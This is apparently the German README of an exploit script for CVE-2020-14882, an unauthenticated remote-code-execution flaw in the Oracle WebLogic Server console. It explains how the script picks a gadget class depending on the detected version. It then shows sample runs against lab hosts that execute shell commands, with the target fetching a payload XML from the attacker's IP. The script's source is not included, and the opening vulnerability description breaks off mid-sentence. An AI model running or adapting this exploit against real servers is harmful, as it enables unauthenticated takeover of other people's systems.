
CVE-2020-14882
CVE-2020-14882
Sicherheitslücke im Oracle WebLogic Server Produkt von Oracle Fusion Middleware (Komponente: Konsole). Betroffene unterstützte Versionen sind 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 und 14.1.1.0.0. Eine leicht ausnutzbare Sicherheitslücke ermöglicht einem nicht authentifizierten Angreifer mit Netzwerkzugriff über HTTP, den Oracle WebLogic Server zu gefährden. Erfolgreiche Angriffe dieser Sicherheitslücke können zur Übernahme des Oracle WebLogic
Für Oracle WebLogic-Versionen vor 12.2.1 müssen wir die Klasse 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' verwenden, da die Klasse 'com.tangosol.coherence.mvel2.sh.ShellSession' nicht verfügbar ist.
Das Skript wechselt automatisch zwischen den beiden Klassen für die Befehlsausführung, abhängig von den erkannten Versionen.
Einige der aktuell auf Github verfügbaren Skripte zur Ausnutzung von CVE-2020-14882 unterstützen nur die Klasse 'com.tangosol.coherence.mvel2.sh.ShellSession', was bedeutet, dass die Skripte auf WebLogic-Versionen 10.3.6.0.0 und 12.1.3.0.0 fehlschlagen.
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux